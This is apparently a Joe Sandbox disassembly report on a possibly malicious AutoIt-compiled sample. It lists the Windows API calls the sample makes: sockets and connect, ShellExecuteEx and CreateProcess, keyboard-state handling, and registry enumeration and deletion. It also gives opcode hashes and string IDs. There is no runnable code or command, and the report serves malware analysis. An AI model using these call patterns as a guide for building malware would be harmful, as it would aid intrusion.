                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X
                                                    • API String ID: 774024439-3081909835
                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006C6C00
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006C6C21
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C6C34
                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 006C6CEA
                                                    • inet_ntoa.WSOCK32(?), ref: 006C6CA7
                                                      • Part of subcall function 006AA7E9: _strlen.LIBCMT ref: 006AA7F3
                                                      • Part of subcall function 006AA7E9: _memmove.LIBCMT ref: 006AA815
                                                    • _strlen.LIBCMT ref: 006C6D44
                                                    • _memmove.LIBCMT ref: 006C6DAD
                                                    Similarity
                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 3619996494-0
                                                    APIs
                                                    • _memset.LIBCMT ref: 006CF448
                                                    • _memset.LIBCMT ref: 006CF511
                                                    • ShellExecuteExW.SHELL32(?), ref: 006CF556
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                      • Part of subcall function 0066FC86: _wcscpy.LIBCMT ref: 0066FCA9
                                                    • GetProcessId.KERNEL32(00000000), ref: 006CF5CD
                                                    • CloseHandle.KERNEL32(00000000), ref: 006CF5FC
                                                    Strings
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 3522835683-2766056989
                                                    APIs
                                                    • GetParent.USER32(?), ref: 006B0F8C
                                                    • GetKeyboardState.USER32(?), ref: 006B0FA1
                                                    • SetKeyboardState.USER32(?), ref: 006B1002
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 006B1030
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 006B104F
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 006B1095
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006B10B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 1c5a715ee5f66b8eb6b2271f8397030cbf6141fae5f9b479b0603892e0348cd0
                                                    • Instruction ID: 12d3fd74f2b4f815a62ac21512030d792c80743fda66746b5e62485422f6ddc3
                                                    • Opcode Fuzzy Hash: 1c5a715ee5f66b8eb6b2271f8397030cbf6141fae5f9b479b0603892e0348cd0
                                                    • Instruction Fuzzy Hash: A851F1E0A046D53DFB3252388C25BF7BEAB5B07304F488589E1D54A9C3C6A8DCD5D751
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 006B0DA5
                                                    • GetKeyboardState.USER32(?), ref: 006B0DBA
                                                    • SetKeyboardState.USER32(?), ref: 006B0E1B
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006B0E47
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006B0E64
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006B0EA8
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006B0EC9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 7cbf9f059c3c5f904f2ab1bf9c4ec9508588a37389625aa16a2cc24ea3b60b0d
                                                    • Instruction ID: 4a2469c79836f378be95ea306e80c82671c4cdfbb4ce8377ae7301999bd6ad1b
                                                    • Opcode Fuzzy Hash: 7cbf9f059c3c5f904f2ab1bf9c4ec9508588a37389625aa16a2cc24ea3b60b0d
                                                    • Instruction Fuzzy Hash: 0351C1E0A446D53DFB3283648855BFBBFAA6F06300F088889E1D54A9C2D395EDD9D760
                                                    APIs
                                                    • GetWindowRect.USER32(00E1DB70,?), ref: 006D9863
                                                    • ScreenToClient.USER32(00000002,00000002), ref: 006D9896
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 006D9903
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID: @U=u$hW
                                                    • API String ID: 3880355969-4076565667
                                                    • Opcode ID: 6d17aaa0fb528532325cfd87b9d7bc2a0254edeccab2e75f678c1a2388f1339d
                                                    • Instruction ID: 61abf83a2f7483afef3cd1c1dfa42a4143f2b8297ead50c264adbb6787e5364c
                                                    • Opcode Fuzzy Hash: 6d17aaa0fb528532325cfd87b9d7bc2a0254edeccab2e75f678c1a2388f1339d
                                                    • Instruction Fuzzy Hash: 41512C34E00209EFCB14CF58C890AEE7BB6FB55760F14865AF8559B3A0D731AD41DBA0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 50b18faea9ef105e132a86d6901fd9a2dded0f9d71f94b91fdc0b6235c2bec54
                                                    • Instruction ID: 6dea8a567f2afc4a4bce5cf66d8fa1330503db0cfbdbd0ca40c1167bb65ffe6a
                                                    • Opcode Fuzzy Hash: 50b18faea9ef105e132a86d6901fd9a2dded0f9d71f94b91fdc0b6235c2bec54
                                                    • Instruction Fuzzy Hash: 8A419565C10614B6CB51EBB48C46ACFB3BA9F04310F50C96AE51DE3221FB34A395C7AE
                                                    APIs
                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006AD5D4
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006AD60A
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006AD61B
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006AD69D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: ,,n$DllGetClassObject
                                                    • API String ID: 753597075-149241901
                                                    • Opcode ID: 7e3ca04929d63511eb0e45fd305357d100a0596bf94e8665907b97e8a7eccf71
                                                    • Instruction ID: 7802ba3ab947740359da2147c69cb758c3ea60f5e47150e87ff6f3c090532ad1
                                                    • Opcode Fuzzy Hash: 7e3ca04929d63511eb0e45fd305357d100a0596bf94e8665907b97e8a7eccf71
                                                    • Instruction Fuzzy Hash: 1E41A2B1600204EFDB05EF54C884A9A7BBAEF46310F1591ADEC0A9F605D7B1DD44CFA0
                                                    APIs
                                                      • Part of subcall function 006B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006B3697,?), ref: 006B468B
                                                      • Part of subcall function 006B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006B3697,?), ref: 006B46A4
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 006B36B7
                                                    • _wcscmp.LIBCMT ref: 006B36D3
                                                    • MoveFileW.KERNEL32(?,?), ref: 006B36EB
                                                    • _wcscat.LIBCMT ref: 006B3733
                                                    • SHFileOperationW.SHELL32(?), ref: 006B379F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1377345388-1173974218
                                                    • Opcode ID: 8e4781fb6fc97998cf52247983c0eb58ed05b299e71337d8bdb3fde3fb171905
                                                    • Instruction ID: 061f82555417f56532553d1f63d2b26feeedd2cdabd2d0bb037982e2ef8a2152
                                                    • Opcode Fuzzy Hash: 8e4781fb6fc97998cf52247983c0eb58ed05b299e71337d8bdb3fde3fb171905
                                                    • Instruction Fuzzy Hash: 1D4181B1608345AEC791EF64C451ADFB7E9AF89340F00093EF49AC3251EA34D689C75A
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006D88DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID: @U=u$hW
                                                    • API String ID: 634782764-4076565667
                                                    • Opcode ID: cdb885de1261641c12eb5f84a23670bac36834b4e223c3b1411e469841cb8fa2
                                                    • Instruction ID: 5a49170a4dae672b4f2f4c83d0783eec6ce4736cb88b901bfa0dfe7b47ce4ca9
                                                    • Opcode Fuzzy Hash: cdb885de1261641c12eb5f84a23670bac36834b4e223c3b1411e469841cb8fa2
                                                    • Instruction Fuzzy Hash: BB31AE34E00108AEEB249A5CCC5DBF877A7EB05310FA44113FA91EB3E1CA30E9419796
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 006D0FD4
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006D0FFE
                                                    • FreeLibrary.KERNEL32(00000000), ref: 006D10B5
                                                      • Part of subcall function 006D0FA5: RegCloseKey.ADVAPI32(?), ref: 006D101B
                                                      • Part of subcall function 006D0FA5: FreeLibrary.KERNEL32(?), ref: 006D106D
                                                      • Part of subcall function 006D0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006D1090
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 006D1058
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: bb7cd100aefdec8e4129e680905883fcba7b389d4828bf9303aa72c12df0a087
                                                    • Instruction ID: 3c43e6c693e985fa9a01750d972e57e986c12fe4dbcc485439f1f6b064ec8091
                                                    • Opcode Fuzzy Hash: bb7cd100aefdec8e4129e680905883fcba7b389d4828bf9303aa72c12df0a087
                                                    • Instruction Fuzzy Hash: D9310C71D01109BFEB159F90DC89EFFB7BDEF09300F10416AE512E6251EA749E859AA0
                                                    APIs
                                                      • Part of subcall function 006C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006C7DB6
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006C61C6
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C61D5
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006C620E
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 006C6217
                                                    • WSAGetLastError.WSOCK32 ref: 006C6221
                                                    • closesocket.WSOCK32(00000000), ref: 006C624A
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006C6263
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: 2c26370c87e8b80e38c9a2f6da851d2a4f1b7d93a57921156722eb4421a35710
                                                    • Instruction ID: eded02ea00e9b7e093532fbe4944446f8caf3601c8929008dfd9334ae0327eea
                                                    • Opcode Fuzzy Hash: 2c26370c87e8b80e38c9a2f6da851d2a4f1b7d93a57921156722eb4421a35710
                                                    • Instruction Fuzzy Hash: 6831A131600108AFDF10AF64CC85FBE77AAEF45711F04402DFD06A7291CB74AD059BA5
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006A8F14
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006A8F27
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 006A8F57
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove$ClassName
                                                    • String ID: @U=u$ComboBox$ListBox
                                                    • API String ID: 365058703-2258501812
                                                    • Opcode ID: bf3a72ff4eb700a225066bf56970b51d7a627013c599f845e4342d23b39572da
                                                    • Instruction ID: 3c634703c8237fc19128773688ba14fcf6e34c7a50f30e6f227929599e198251
                                                    • Opcode Fuzzy Hash: bf3a72ff4eb700a225066bf56970b51d7a627013c599f845e4342d23b39572da
                                                    • Instruction Fuzzy Hash: D121D271A05105BEDB14ABB09C45DFEB7ABDF06360F14861EF825972E1DB395C09DA20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: f5e19417e8e4fb5e72744a2db165ff1cb22b6c4fa3fec136615a65fc7498a112
                                                    • Instruction ID: 5a4e73fc60d795f69be1bf5dedd408ebba8ae64d7295a8a5618d080bba1005ec
                                                    • Opcode Fuzzy Hash: f5e19417e8e4fb5e72744a2db165ff1cb22b6c4fa3fec136615a65fc7498a112
                                                    • Instruction Fuzzy Hash: 2E21377220461266D220B774AC12EE7739FEF57340F10843DF84586291EB919D42D7AA
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 006AB204
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006AB221
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006AB259
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006AB27F
                                                    • _wcsstr.LIBCMT ref: 006AB289
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID: @U=u
                                                    • API String ID: 3902887630-2594219639
                                                    • Opcode ID: 2e1865e6a950c37f20074faeb2b9ff7b9ccc503ad119a456ea6009e6df019cc3
                                                    • Instruction ID: 08712602d330cadef59ccc9649909584846cfb07a6b4d3269c6d35fe0c45240b
                                                    • Opcode Fuzzy Hash: 2e1865e6a950c37f20074faeb2b9ff7b9ccc503ad119a456ea6009e6df019cc3
                                                    • Instruction Fuzzy Hash: 3A213A31604200BBEB15AB759C05FBF7B9ADF46710F00903FF809CA292EF61CD419A60
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006A9320
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006A9352
                                                    • __itow.LIBCMT ref: 006A936A
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006A9392
                                                    • __itow.LIBCMT ref: 006A93A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow$_memmove
                                                    • String ID: @U=u
                                                    • API String ID: 2983881199-2594219639
                                                    • Opcode ID: 023e2e0853568ced89d6e0b20040e7e0594ac92f01988fc57df5d33ee58f6c1f
                                                    • Instruction ID: f24a879a113adc8d283205681a9273348ebb98891bd0990bd4834b6bff2469bc
                                                    • Opcode Fuzzy Hash: 023e2e0853568ced89d6e0b20040e7e0594ac92f01988fc57df5d33ee58f6c1f
                                                    • Instruction Fuzzy Hash: B821D631B01204ABDF10AB609C89EEE7BBEEB4A711F148029FD05D72C0D670DD459BA1
                                                    APIs
                                                      • Part of subcall function 00651D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00651D73
                                                      • Part of subcall function 00651D35: GetStockObject.GDI32(00000011), ref: 00651D87
                                                      • Part of subcall function 00651D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00651D91
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006D7632
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006D763F
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006D764A
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006D7659
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006D7665
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: bc476ecfce83d3da42ee9ce6099d41c5e13883a3febe3b8c5c35e48267367fd6
                                                    • Instruction ID: 0be2a17c5a67b991dfb15aa914aaca1d9801f695da4dbce7c08ee1f22134f3a6
                                                    • Opcode Fuzzy Hash: bc476ecfce83d3da42ee9ce6099d41c5e13883a3febe3b8c5c35e48267367fd6
                                                    • Instruction Fuzzy Hash: 2211B2B2510219BFEF158F64CC85EE77F6EEF08798F014115BA04A61A0DB72DC21DBA4
                                                    APIs
                                                    • _memset.LIBCMT ref: 006DB644
                                                    • _memset.LIBCMT ref: 006DB653
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00716F20,00716F64), ref: 006DB682
                                                    • CloseHandle.KERNEL32 ref: 006DB694
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID: oq$doq
                                                    • API String ID: 3277943733-3391684421
                                                    • Opcode ID: 5ed428510d5d8e485d9f4cf6d2fb1ce8d5ce5737f49dd2aff1f8fc2d38f4d87a
                                                    • Instruction ID: c98c453e4b86e254e536446737b940f25b31344038af4302bd33b8c6b407e3e1
                                                    • Opcode Fuzzy Hash: 5ed428510d5d8e485d9f4cf6d2fb1ce8d5ce5737f49dd2aff1f8fc2d38f4d87a
                                                    • Instruction Fuzzy Hash: 76F03AB2941300BAE3102769BC06FFB7A9EEB08395F01C025FA09E51D2D7798801C7AC
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00673F85), ref: 00674085
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0067408C
                                                    • EncodePointer.KERNEL32(00000000), ref: 00674097
                                                    • DecodePointer.KERNEL32(00673F85), ref: 006740B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
